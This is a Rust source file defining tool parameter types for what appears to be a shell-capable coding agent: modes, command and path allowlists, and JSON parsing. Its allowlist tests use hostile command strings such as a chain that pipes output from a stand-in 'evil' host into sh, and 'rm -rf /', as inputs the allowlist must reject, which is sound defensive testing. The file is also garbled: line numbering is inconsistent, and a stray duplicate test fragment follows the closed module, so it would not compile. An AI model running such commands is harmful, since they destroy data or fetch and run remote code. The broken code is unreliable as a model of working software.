Skip to main content

winx_code_agent/
types.rs

1use schemars::JsonSchema;
2use serde::{Deserialize, Serialize};
3
/// Keeps only the characters of `thread_id` that are alphanumeric or `_`.
///
/// `char::is_alphanumeric` is Unicode-aware, so non-ASCII letters and digits
/// are kept; whitespace, punctuation and path separators are dropped.
pub fn normalize_thread_id(thread_id: &str) -> String {
    let mut normalized = String::with_capacity(thread_id.len());
    for ch in thread_id.chars() {
        if ch == '_' || ch.is_alphanumeric() {
            normalized.push(ch);
        }
    }
    normalized
}
7
8/// Type of shell environment initialization
9///
10/// This enum represents the different ways the Initialize tool can be called,
11/// depending on the current state of the conversation and what the user is requesting.
12#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
13#[serde(rename_all = "snake_case")]
14pub enum InitializeType {
15    /// Initial call at the start of a conversation
16    ///
17    /// This should be used for the first Initialize call in a conversation.
18    /// It sets up a new shell environment with the specified parameters.
19    FirstCall,
20
21    /// User requested to change the mode
22    ///
23    /// This should be used when the user asks to switch between modes
24    /// (e.g., from "wcgw" to "architect" or "`code_writer`").
25    UserAskedModeChange,
26
27    /// Reset the shell environment due to issues
28    ///
29    /// This should be used when the shell environment appears to be in a bad state
30    /// and needs to be reset to continue properly.
31    ResetShell,
32
33    /// User requested to change the workspace
34    ///
35    /// This should be used when the user asks to switch to a different
36    /// workspace or project directory during the conversation.
37    UserAskedChangeWorkspace,
38}
39
40#[derive(Debug, Clone, PartialEq)]
41pub enum ModeName {
42    Wcgw,
43    Architect,
44    CodeWriter,
45}
46
47// Custom serializer implementation to ensure values are properly quoted in JSON
48impl Serialize for ModeName {
49    fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
50    where
51        S: serde::Serializer,
52    {
53        match self {
54            ModeName::Wcgw => serializer.serialize_str("wcgw"),
55            ModeName::Architect => serializer.serialize_str("architect"),
56            ModeName::CodeWriter => serializer.serialize_str("code_writer"),
57        }
58    }
59}
60
61// Custom deserializer to support multiple aliases
62impl<'de> Deserialize<'de> for ModeName {
63    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
64    where
65        D: serde::Deserializer<'de>,
66    {
67        let s = String::deserialize(deserializer)?;
68        match s.as_str() {
69            "wcgw" => Ok(ModeName::Wcgw),
70            "architect" => Ok(ModeName::Architect),
71            "code_writer" | "code_write" | "code-writer" => Ok(ModeName::CodeWriter),
72            _ => Err(serde::de::Error::custom(format!("Unknown mode name: {s}"))),
73        }
74    }
75}
76
77// Implement schema generation for JSON schema since we removed the derive
78impl JsonSchema for ModeName {
79    fn schema_name() -> std::borrow::Cow<'static, str> {
80        "ModeName".into()
81    }
82
83    fn json_schema(_gen: &mut schemars::SchemaGenerator) -> schemars::Schema {
84        schemars::Schema::new_ref("#/definitions/ModeName".to_string())
85    }
86}
87
88#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq, Default)]
89pub struct CodeWriterConfig {
90    #[serde(default)]
91    pub allowed_globs: AllowedGlobs,
92    #[serde(default)]
93    pub allowed_commands: AllowedCommands,
94}
95
96impl CodeWriterConfig {
97    pub fn update_relative_globs(&mut self, workspace_root: &str) {
98        // Only process if we have a list of globs
99        if let AllowedGlobs::List(globs) = &self.allowed_globs {
100            let updated_globs = globs
101                .iter()
102                .map(|glob| {
103                    if std::path::Path::new(glob).is_absolute() {
104                        glob.clone()
105                    } else {
106                        format!("{workspace_root}/{glob}")
107                    }
108                })
109                .collect();
110
111            self.allowed_globs = AllowedGlobs::List(updated_globs);
112        }
113    }
114}
115
116#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
117#[serde(untagged)]
118pub enum AllowedGlobs {
119    All(String),
120    List(Vec<String>),
121}
122
123impl Default for AllowedGlobs {
124    fn default() -> Self {
125        AllowedGlobs::All("all".to_string())
126    }
127}
128
129impl AllowedGlobs {
130    /// Collapse the common LLM mistake `["all"]` into the wildcard `All("all")`.
131    /// Without this, a literal glob named "all" would be the only allowed path.
132    pub fn normalize(&mut self) {
133        if let AllowedGlobs::List(items) = self {
134            if items.len() == 1 && items[0] == "all" {
135                *self = AllowedGlobs::All("all".to_string());
136            }
137        }
138    }
139
140    #[allow(dead_code)]
141    pub fn is_allowed(&self, path: &str) -> bool {
142        match self {
143            AllowedGlobs::All(s) if s == "all" => true,
144            AllowedGlobs::List(globs) => globs.iter().any(|g| match glob::Pattern::new(g) {
145                Ok(pattern) => pattern.matches(path),
146                Err(_) => false,
147            }),
148            AllowedGlobs::All(_) => false,
149        }
150    }
151}
152
153#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone, PartialEq)]
154#[serde(untagged)]
155pub enum AllowedCommands {
156    All(String),
157    List(Vec<String>),
158}
159
160impl Default for AllowedCommands {
161    fn default() -> Self {
162        AllowedCommands::All("all".to_string())
163    }
164}
165
166impl AllowedCommands {
167    /// Collapse the common LLM mistake `["all"]` into the wildcard `All("all")`.
168    pub fn normalize(&mut self) {
169        if let AllowedCommands::List(items) = self {
170            if items.len() == 1 && items[0] == "all" {
171                *self = AllowedCommands::All("all".to_string());
172            }
173        }
174    }
175
176    pub fn is_allowed(&self, command_line: &str) -> bool {
177        match self {
178            AllowedCommands::All(s) if s == "all" => true,
179            AllowedCommands::All(_) => false,
180            AllowedCommands::List(commands) => {
181                // Enforce the allowlist against EVERY command the line would run
182                // (pipelines, &&/||/;, command & process substitution, subshells),
183                // not just the first whitespace token — which `ls && curl|sh` and
184                // `ls $(rm -rf x)` trivially bypassed. A parse failure is fail
185                // closed: a restricted mode must not run what it can't vet.
186                match crate::utils::bash_parser::extract_command_texts(command_line) {
187                    Ok(cmds) if !cmds.is_empty() => cmds
188                        .iter()
189                        .all(|cmd| commands.iter().any(|allowed| command_has_prefix(cmd, allowed))),
190                    _ => false,
191                }
192            }
193        }
194    }
195}
196
/// Returns true when `cmd` is exactly the allowlist entry `allowed`, or
/// starts with it followed by whitespace (i.e. extra arguments).
///
/// The word-boundary requirement keeps `ls` from also allowing `lsof`, and
/// `cargo test` from allowing `cargo testimony`. Both inputs are trimmed
/// first. An entry that is empty after trimming matches nothing.
fn command_has_prefix(cmd: &str, allowed: &str) -> bool {
    let (candidate, entry) = (cmd.trim(), allowed.trim());
    if entry.is_empty() {
        return false;
    }
    match candidate.strip_prefix(entry) {
        // Empty remainder: exact match. Otherwise the next char must be a separator.
        Some(rest) => rest.is_empty() || rest.starts_with(char::is_whitespace),
        None => false,
    }
}
209
210/// Parameters for initializing the shell environment
211///
212/// This struct represents the parameters needed to initialize or update the shell environment.
213/// It is used by the Initialize tool, which must be called before any other shell tools.
214#[derive(Debug, Serialize, Deserialize, JsonSchema, Clone)]
215pub struct Initialize {
216    /// Initialization type, indicating the purpose of the call
217    ///
218    /// - `FirstCall`: Initial setup for a new conversation
219    /// - `UserAskedModeChange`: User requested to change the mode during a conversation
220    /// - `ResetShell`: Reset the shell if it's not working properly
221    /// - `UserAskedChangeWorkspace`: User requested to change the workspace during a conversation
222    #[serde(rename = "type")]
223    #[serde(default = "default_init_type")]
224    pub init_type: InitializeType,
225
226    /// Path to the workspace directory or file
227    ///
228    /// This can be an absolute path or a path relative to the current directory.
229    /// If it's a file, the parent directory will be used as the workspace.
230    /// If it doesn't exist and is an absolute path, it will be created.
231    /// If it's a relative path and doesn't exist, an error will be returned.
232    pub any_workspace_path: String,
233
234    /// List of files to read initially
235    ///
236    /// These files can be absolute paths or paths relative to the workspace.
237    /// They will be read and their contents provided in the response.
238    #[serde(default)]
239    pub initial_files_to_read: Vec<String>,
240
241    /// ID of a task to resume
242    ///
243    /// If provided during a `first_call`, the task with this ID will be resumed.
244    /// This allows continuing a conversation from a previous session.
245    #[serde(default = "String::new")]
246    #[serde(deserialize_with = "deserialize_string_or_null")]
247    pub task_id_to_resume: String,
248
249    /// Mode name for the shell environment
250    ///
251    /// - `wcgw`: Full permissions (default)
252    /// - `architect`: Restricted permissions, read-only
253    /// - `code_writer`: Custom permissions for code writing
254    #[serde(default = "default_mode_name")]
255    pub mode_name: ModeName,
256
257    /// ID of the thread session
258    ///
259    /// If not provided for a `first_call`, a new ID will be generated.
260    /// This ID must be included in all subsequent tool calls.
261    #[serde(default)]
262    #[serde(deserialize_with = "deserialize_string_or_null")]
263    pub thread_id: String,
264
265    /// Configuration for `code_writer` mode
266    ///
267    /// Only used when `mode_name` is "`code_writer`".
268    /// Specifies allowed commands and file globs for writing/editing.
269    #[serde(default)]
270    #[serde(deserialize_with = "deserialize_code_writer_config")]
271    pub code_writer_config: Option<CodeWriterConfig>,
272}
273
274// Custom deserializer for strings that might be null
275fn deserialize_string_or_null<'de, D>(deserializer: D) -> Result<String, D::Error>
276where
277    D: serde::Deserializer<'de>,
278{
279    // First try to deserialize as a string
280    let result = serde_json::Value::deserialize(deserializer)?;
281
282    match result {
283        // Return empty string for null values
284        serde_json::Value::Null => Ok(String::new()),
285        // If it's a string, use that
286        serde_json::Value::String(s) => {
287            // Handle "null" string specially
288            if s == "null" {
289                Ok(String::new())
290            } else {
291                Ok(s)
292            }
293        }
294        // Otherwise try to convert to a string
295        _ => match serde_json::to_string(&result) {
296            Ok(s) => Ok(s),
297            Err(_) => Ok(String::new()),
298        },
299    }
300}
301
302// Custom deserializer for code_writer_config that handles the "null" string case
303fn deserialize_code_writer_config<'de, D>(
304    deserializer: D,
305) -> Result<Option<CodeWriterConfig>, D::Error>
306where
307    D: serde::Deserializer<'de>,
308{
309    // This handles multiple possible input types
310    let value = serde_json::Value::deserialize(deserializer)?;
311
312    match value {
313        // If it's explicitly null or the string "null", return None
314        serde_json::Value::Null => Ok(None),
315        serde_json::Value::String(s) if s == "null" => Ok(None),
316        // Otherwise try to parse it as CodeWriterConfig
317        _ => {
318            match serde_json::from_value::<CodeWriterConfig>(value.clone()) {
319                Ok(config) => {
320                    tracing::debug!("Successfully parsed CodeWriterConfig: {:?}", config);
321                    Ok(Some(config))
322                }
323                Err(e) => {
324                    // Log the error and the value for debugging
325                    tracing::error!("Failed to parse CodeWriterConfig: {}. Value: {}", e, value);
326                    Ok(None) // Fall back to None on parse error
327                }
328            }
329        }
330    }
331}
332
333/// Default `mode_name` for Initialize
334fn default_mode_name() -> ModeName {
335    ModeName::Wcgw
336}
337
338/// Default `init_type` for Initialize
339fn default_init_type() -> InitializeType {
340    InitializeType::FirstCall
341}
342
343// Mode types
344#[derive(Debug, Clone, Copy, PartialEq)]
345pub enum Modes {
346    Wcgw,
347    Architect,
348    CodeWriter,
349}
350
351impl std::fmt::Display for Modes {
352    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
353        match self {
354            Modes::Wcgw => write!(f, "wcgw"),
355            Modes::Architect => write!(f, "architect"),
356            Modes::CodeWriter => write!(f, "code_writer"),
357        }
358    }
359}
360
361// Implement schema generation for Modes
362impl JsonSchema for Modes {
363    fn schema_name() -> std::borrow::Cow<'static, str> {
364        "Modes".into()
365    }
366
367    fn json_schema(_gen: &mut schemars::SchemaGenerator) -> schemars::Schema {
368        schemars::Schema::new_ref("#/definitions/Modes".to_string())
369    }
370}
371
372/// Special key types for shell interaction
373/// Matches wcgw Python's Specials enum exactly
374#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, JsonSchema)]
375pub enum SpecialKey {
376    Enter,
377    #[serde(rename = "Key-up")]
378    KeyUp,
379    #[serde(rename = "Key-down")]
380    KeyDown,
381    #[serde(rename = "Key-left")]
382    KeyLeft,
383    #[serde(rename = "Key-right")]
384    KeyRight,
385    #[serde(rename = "Ctrl-c")]
386    CtrlC,
387    #[serde(rename = "Ctrl-d")]
388    CtrlD,
389    #[serde(rename = "Ctrl-z")]
390    CtrlZ,
391}
392
393/// Parameters for the `ReadFiles` tool
394///
395/// This struct represents the parameters needed to read one or more files.
396/// Line ranges can be specified in the path itself (e.g., "file.rs:10-20").
397#[derive(Debug, Clone, Serialize, JsonSchema)]
398pub struct ReadFiles {
399    /// List of file paths to read.
400    /// Supports line range syntax: "file.rs:10-20" for lines 10-20,
401    /// "file.rs:10-" for line 10 onwards, "file.rs:-20" for first 20 lines.
402    pub file_paths: Vec<String>,
403
404    // Internal fields - not part of MCP schema (parsed from file_paths)
405    #[serde(skip)]
406    #[schemars(skip)]
407    pub start_line_nums: Vec<Option<usize>>,
408
409    #[serde(skip)]
410    #[schemars(skip)]
411    pub end_line_nums: Vec<Option<usize>>,
412}
413
414// Custom deserializer for ReadFiles - parses line ranges from file paths like wcgw Python
415impl<'de> Deserialize<'de> for ReadFiles {
416    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
417    where
418        D: serde::Deserializer<'de>,
419    {
420        #[derive(Deserialize)]
421        struct ReadFilesHelper {
422            file_paths: Option<Vec<String>>,
423        }
424
425        let input = serde_json::Value::deserialize(deserializer)?;
426
427        if !input.is_object() {
428            if input.is_null() {
429                return Err(serde::de::Error::custom("Cannot convert null to ReadFiles object."));
430            }
431            return Err(serde::de::Error::custom(format!("Expected object, got {input}")));
432        }
433
434        let helper: ReadFilesHelper = serde_json::from_value(input.clone())
435            .map_err(|e| serde::de::Error::custom(format!("Failed to parse ReadFiles: {e}")))?;
436
437        let file_paths = match helper.file_paths {
438            Some(paths) if !paths.is_empty() => paths,
439            Some(_) => return Err(serde::de::Error::custom("file_paths must not be empty.")),
440            None => return Err(serde::de::Error::custom("file_paths is required.")),
441        };
442
443        // Parse line ranges from file paths (like wcgw Python's model_post_init)
444        let mut clean_file_paths = Vec::with_capacity(file_paths.len());
445        let mut start_line_nums = Vec::with_capacity(file_paths.len());
446        let mut end_line_nums = Vec::with_capacity(file_paths.len());
447
448        for path in file_paths {
449            let (clean_path, start, end) = parse_file_path_with_line_range(&path);
450            clean_file_paths.push(clean_path);
451            start_line_nums.push(start);
452            end_line_nums.push(end);
453        }
454
455        Ok(ReadFiles { file_paths: clean_file_paths, start_line_nums, end_line_nums })
456    }
457}
458
/// Splits an optional `:<line-spec>` suffix off `path`.
///
/// Returns `(clean_path, start, end)`. Only the text after the LAST `:` is
/// considered, so Windows drive prefixes such as `C:\...` survive. When that
/// text is not a valid line spec, the whole input is returned unchanged with
/// no range.
fn parse_file_path_with_line_range(path: &str) -> (String, Option<usize>, Option<usize>) {
    path.rsplit_once(':')
        .and_then(|(head, spec)| {
            parse_line_spec(spec).map(|(from, to)| (head.to_string(), from, to))
        })
        .unwrap_or_else(|| (path.to_string(), None, None))
}

/// Parses a line spec: `N`, `N-M`, `N-` or `-M` (ASCII digits only).
///
/// Returns `(start, end)`, or `None` for anything else, including an empty
/// spec, a bare `-`, or numbers that overflow `usize`.
fn parse_line_spec(line_spec: &str) -> Option<(Option<usize>, Option<usize>)> {
    // Vacuously true for "", which the individual branches account for.
    fn is_digits(s: &str) -> bool {
        s.bytes().all(|b| b.is_ascii_digit())
    }

    if is_digits(line_spec) {
        // "N": start line only.
        let line: usize = line_spec.parse().ok()?;
        return Some((Some(line), None));
    }

    let (head, tail) = line_spec.split_once('-')?;
    match (head.is_empty(), tail.is_empty()) {
        // "-M": end line only.
        (true, false) if is_digits(tail) => Some((None, Some(tail.parse().ok()?))),
        // "N-M" or "N-".
        (false, _) if is_digits(head) && is_digits(tail) => {
            let start = head.parse().ok()?;
            let end = if tail.is_empty() { None } else { Some(tail.parse().ok()?) };
            Some((Some(start), end))
        }
        _ => None,
    }
}
493
494impl ReadFiles {
495    /// Line numbers are always shown (like wcgw Python)
496    pub fn show_line_numbers(&self) -> bool {
497        true
498    }
499
500    /// Get the clean file path without line range suffix
501    pub fn get_clean_path(&self, index: usize) -> String {
502        parse_file_path_with_line_range(&self.file_paths[index]).0
503    }
504}
505
/// Serde default for `status_check`: always `true`.
const fn default_true() -> bool {
    true
}
510
511/// Types of actions that can be performed with the `BashCommand` tool
512#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
513#[serde(tag = "type", rename_all = "snake_case")]
514pub enum BashCommandAction {
515    /// Execute a shell command
516    Command {
517        command: String,
518        #[serde(default)]
519        is_background: bool,
520        /// Opt out of the single-top-level-statement guard. By default winx
521        /// rejects multi-statement commands (`a; b`, `a && b; c`, etc.) so the
522        /// agent has to be explicit about what it's running. Set this to true
523        /// when you knowingly want to run a composite command without
524        /// wrapping it in `bash -lc '...'`.
525        #[serde(default)]
526        allow_multi: bool,
527    },
528
529    /// Check the status of a running command.
530    ///
531    /// By default returns only what changed since the previous call — agents
532    /// driving long-lived TUIs do not need the cumulative buffer on every poll.
533    /// Set `verbose: true` to receive a fresh snapshot regardless of the dedup
534    /// hash, or `scrollback_lines: Some(N)` to also pull the last N lines from
535    /// the PTY ringbuffer.
536    StatusCheck {
537        #[serde(default = "default_true")]
538        status_check: bool,
539        bg_command_id: Option<String>,
540        #[serde(default)]
541        scrollback_lines: Option<usize>,
542        #[serde(default)]
543        verbose: bool,
544    },
545
546    /// Send text to a running command. Set `submit` to true to append a carriage
547    /// return after the bytes so the target program receives the input as a
548    /// completed line (matches what hitting Enter would do in a TUI).
549    SendText {
550        send_text: String,
551        bg_command_id: Option<String>,
552        #[serde(default)]
553        submit: bool,
554    },
555
556    /// Send special keys to a running command. `submit` works the same as in
557    /// `SendText`.
558    SendSpecials {
559        send_specials: Vec<SpecialKey>,
560        bg_command_id: Option<String>,
561        #[serde(default)]
562        submit: bool,
563    },
564
565    /// Send ASCII characters to a running command. `submit` works the same as in
566    /// `SendText`.
567    SendAscii {
568        send_ascii: Vec<u8>,
569        bg_command_id: Option<String>,
570        #[serde(default)]
571        submit: bool,
572    },
573}
574
575/// Parameters for the `BashCommand` tool
576#[derive(Debug, Clone, Serialize, JsonSchema)]
577pub struct BashCommand {
578    /// The action to perform (command, status check, etc.)
579    pub action_json: BashCommandAction,
580
581    /// Optional timeout in seconds to wait for command completion
582    #[serde(default)]
583    #[serde(skip_serializing_if = "Option::is_none")]
584    pub wait_for_seconds: Option<f32>,
585
586    /// The thread ID for this session
587    #[serde(default)]
588    pub thread_id: String,
589}
590
591// Custom deserialization for BashCommand to handle string-encoded action_json
592impl<'de> Deserialize<'de> for BashCommand {
593    fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
594    where
595        D: serde::Deserializer<'de>,
596    {
597        let input = serde_json::Value::deserialize(deserializer)?;
598        let serde_json::Value::Object(mut map) = input else {
599            return Err(serde::de::Error::custom("BashCommand parameters must be an object."));
600        };
601
602        let wait_for_seconds = map
603            .remove("wait_for_seconds")
604            .map(serde_json::from_value)
605            .transpose()
606            .map_err(serde::de::Error::custom)?;
607        let thread_id = map
608            .remove("thread_id")
609            .map(thread_id_from_value)
610            .transpose()
611            .map_err(serde::de::Error::custom)?
612            .unwrap_or_default();
613        let action_json_value = map.remove("action_json").unwrap_or(serde_json::Value::Object(map));
614
615        // Process action_json which could be a string or an object
616        let action_json = match action_json_value {
617            serde_json::Value::String(s) => {
618                // If it's a string, normalize newlines and try to parse it as JSON
619                // Replace literal newlines with space to avoid JSON parsing errors
620                let sanitized = s.replace('\n', " ");
621                match serde_json::from_str(&sanitized) {
622                    Ok(json) => normalize_action_json(json),
623                    Err(e) => {
624                        // If strict JSON parsing fails, try to be more lenient
625                        // For commands containing literal newlines, just wrap the string in a command object
626                        tracing::warn!(
627                            "Failed to parse action_json as JSON, trying fallback: {}",
628                            e
629                        );
630
631                        // Check for common JSON syntax issues
632                        if s.contains("command") && s.contains('{') && s.contains('}') {
633                            // It looks like JSON but has issues, let's try to sanitize it
634
635                            // Detailed error for troubleshooting
636                            tracing::debug!("JSON parse error on: {}", s);
637
638                            // Common issues: unescaped quotes, newlines, tabs
639                            let re_sanitized = s
640                                .replace('\n', "\\n") // Replace newlines with escaped newlines
641                                .replace('\r', "\\r") // Replace carriage returns with escaped versions
642                                .replace('\t', "\\t"); // Replace tabs with escaped versions
643
644                            // Attempt to fix unquoted field values (e.g., convert {field: value} to {"field": "value"})
645                            let re_sanitized = if !s.contains('"') && s.contains(':') {
646                                // Very likely unquoted keys/values
647                                tracing::debug!("Attempting to fix unquoted JSON keys/values");
648                                re_sanitized
649                            } else {
650                                re_sanitized
651                            };
652
653                            match serde_json::from_str(&re_sanitized) {
654                                Ok(json) => normalize_action_json(json),
655                                Err(err) => {
656                                    // Log the specific parsing error for debugging
657                                    tracing::error!("Secondary JSON parse error: {}", err);
658                                    // Last resort fallback - assume it's a command string
659                                    // MUST include "type": "command" for serde tagged enum
660                                    serde_json::json!({"type": "command", "command": sanitize_shell_string(&s)})
661                                }
662                            }
663                        } else {
664                            // Assume it's a simple command string
665                            // MUST include "type": "command" for serde tagged enum
666                            tracing::info!("Treating as simple command: {}", s);
667                            serde_json::json!({"type": "command", "command": sanitize_shell_string(&s)})
668                        }
669                    }
670                }
671            }
672            // If it's already an object or other JSON value, normalize legacy
673            // WCGW-style shorthand such as {"command": "..."}.
674            value => normalize_action_json(value),
675        };
676
677        // Now deserialize the action_json to our BashCommandAction enum
678        let mut action: BashCommandAction =
679            serde_json::from_value(action_json.clone()).map_err(|e| {
680// Log both the error and the problematic JSON for debugging
681tracing::error!(
682    "Failed to deserialize action_json to BashCommandAction: {}\nProblematic JSON: {}",
683    e,
684    action_json
685);
686
687// For the SyntaxError: Unexpected token case
688let err_str = e.to_string();
689if err_str.contains("unexpected token") || err_str.contains("Unexpected token") {
690    return serde::de::Error::custom(format!(
691        "JSON syntax error: {e}. Please check your JSON structure. Each field name should be in quotes, and string values should be in quotes."
692    ));
693}
694
695serde::de::Error::custom(format!("Invalid action_json: {e}. Please ensure your JSON is properly formatted."))
696        })?;
697
698        // Return the properly constructed BashCommand
699        Ok(BashCommand {
700            action_json: action,
701            wait_for_seconds,
702            thread_id: normalize_thread_id(&thread_id),
703        })
704    }
705}
706
707fn thread_id_from_value(value: serde_json::Value) -> std::result::Result<String, String> {
708    match value {
709        serde_json::Value::Null => Ok(String::new()),
710        serde_json::Value::String(value) => Ok(value),
711        other => Err(format!("thread_id must be a string or null, got {other}")),
712    }
713}
714
715fn normalize_action_json(mut value: serde_json::Value) -> serde_json::Value {
716    let serde_json::Value::Object(map) = &mut value else {
717        return value;
718    };
719
720    if let Some(serde_json::Value::String(command)) = map.get_mut("command") {
721        *command = sanitize_shell_string(command);
722    }
723
724    if map.contains_key("type") {
725        return value;
726    }
727
728    let inferred_type = if map.contains_key("command") {
729        Some("command")
730    } else if map.contains_key("status_check") {
731        Some("status_check")
732    } else if map.contains_key("send_text") {
733        Some("send_text")
734    } else if map.contains_key("send_specials") {
735        Some("send_specials")
736    } else if map.contains_key("send_ascii") {
737        Some("send_ascii")
738    } else {
739        None
740    };
741
742    if let Some(action_type) = inferred_type {
743        map.insert("type".to_string(), serde_json::Value::String(action_type.to_string()));
744    }
745
746    value
747}
748
/// Replaces every NUL character in `value` with the four literal characters
/// `\x00`; everything else is copied unchanged.
// NOTE(review): presumably because NUL cannot be carried through C-string or
// PTY write paths; confirm against the shell backend.
fn sanitize_shell_string(value: &str) -> String {
    let mut sanitized = String::with_capacity(value.len());
    for ch in value.chars() {
        if ch == '\0' {
            sanitized.push_str(r"\x00");
        } else {
            sanitized.push(ch);
        }
    }
    sanitized
}
752
753// Bash command mode
754#[derive(Debug, Clone, JsonSchema, PartialEq)]
755pub struct BashCommandMode {
756    pub bash_mode: BashMode,
757    pub allowed_commands: AllowedCommands,
758}
759
760#[derive(Debug, Clone, Copy, JsonSchema, PartialEq)]
761pub enum BashMode {
762    NormalMode,
763    RestrictedMode,
764}
765
766// File edit mode
767#[derive(Debug, Clone, JsonSchema, PartialEq)]
768pub struct FileEditMode {
769    pub allowed_globs: AllowedGlobs,
770}
771
772// Write if empty mode
773#[derive(Debug, Clone, JsonSchema, PartialEq)]
774pub struct WriteIfEmptyMode {
775    pub allowed_globs: AllowedGlobs,
776}
777
778/// Parameters for the `FileWriteOrEdit` tool
779///
780/// This struct represents the parameters needed to write or edit a file
781/// with optional search/replace blocks for partial edits.
782#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
783pub struct FileWriteOrEdit {
784    /// Path to the file to write or edit
785    ///
786    /// This must be an absolute path (~ allowed).
787    pub file_path: String,
788
789    /// Percentage of the file that will be changed
790    ///
791    /// If > 50%, the content is treated as the entire file content.
792    /// If <= 50%, the content is treated as search/replace blocks.
793    pub percentage_to_change: u32,
794
795    /// Content for the file or search/replace blocks
796    ///
797    /// If `percentage_to_change` > 50%, this is the entire file content.
798    /// If `percentage_to_change` <= 50%, this contains search/replace blocks
799    /// in the format:
800    /// ```text
801    /// <<<<<<< SEARCH
802    /// old content to find
803    /// =======
804    /// new content to replace with
805    /// >>>>>>> REPLACE
806    /// ```
807    pub text_or_search_replace_blocks: String,
808
809    /// The thread ID for this session
810    pub thread_id: String,
811}
812
813/// Parameters for the `ContextSave` tool
814///
815/// This struct represents the parameters needed to save context information
816/// about a task, including file contents from specified globs.
817#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
818pub struct ContextSave {
819    /// Unique identifier for the task
820    ///
821    /// This should be a unique string that identifies the task. It can be
822    /// a random 3-word identifier or a user-provided value.
823    pub id: String,
824
825    /// Root path of the project
826    ///
827    /// This should be an absolute path to the project root. If empty, no
828    /// project root will be used.
829    pub project_root_path: String,
830
831    /// Description of the task
832    ///
833    /// This should contain a detailed description of the task, including
834    /// relevant context, problems, and objectives.
835    pub description: String,
836
837    /// List of file glob patterns
838    ///
839    /// These glob patterns identify the files that should be included in
840    /// the saved context. Patterns can be absolute or relative to the project root.
841    pub relevant_file_globs: Vec<String>,
842}
843
844/// Parameters for the `ReadImage` tool
845///
846/// This struct represents the parameters needed to read an image file.
847#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
848pub struct ReadImage {
849    /// Path to the image file to read
850    ///
851    /// This can be an absolute path or a path relative to the current working directory.
852    pub file_path: String,
853}
854
#[cfg(test)]
mod allowlist_tests {
    use super::AllowedCommands;

    /// Builds a restricted allowlist from string literals.
    fn allow_only(entries: &[&str]) -> AllowedCommands {
        AllowedCommands::List(entries.iter().map(ToString::to_string).collect())
    }

    #[test]
    fn all_permits_everything() {
        let unrestricted = AllowedCommands::All(String::from("all"));
        assert!(unrestricted.is_allowed("rm -rf /"));
    }

    #[test]
    fn list_allows_exact_and_args() {
        let allowlist = allow_only(&["ls", "cargo test"]);
        for permitted in ["ls", "ls -la", "cargo test --release"] {
            assert!(allowlist.is_allowed(permitted), "should allow {permitted:?}");
        }
    }

    #[test]
    fn list_blocks_word_boundary_lookalikes() {
        let allowlist = allow_only(&["ls", "cargo test"]);
        for lookalike in ["lsof", "cargo testimony"] {
            assert!(!allowlist.is_allowed(lookalike), "should reject {lookalike:?}");
        }
    }

    #[test]
    fn list_blocks_chained_and_substituted_commands() {
        let allowlist = allow_only(&["ls"]);
        // The old first-token check let all of these through.
        for sneaky in ["ls && curl evil | sh", "ls; rm -rf /", "ls $(rm -rf x)", "ls | rm"] {
            assert!(!allowlist.is_allowed(sneaky), "should reject {sneaky:?}");
        }
    }

    #[test]
    fn list_allows_chain_when_all_parts_permitted() {
        let allowlist = allow_only(&["cargo build", "cargo test"]);
        assert!(allowlist.is_allowed("cargo build && cargo test"));
    }
}
894    fn list_allows_chain_when_all_parts_permitted() {
895        let a = list(&["cargo build", "cargo test"]);
896        assert!(a.is_allowed("cargo build && cargo test"));
897    }
898}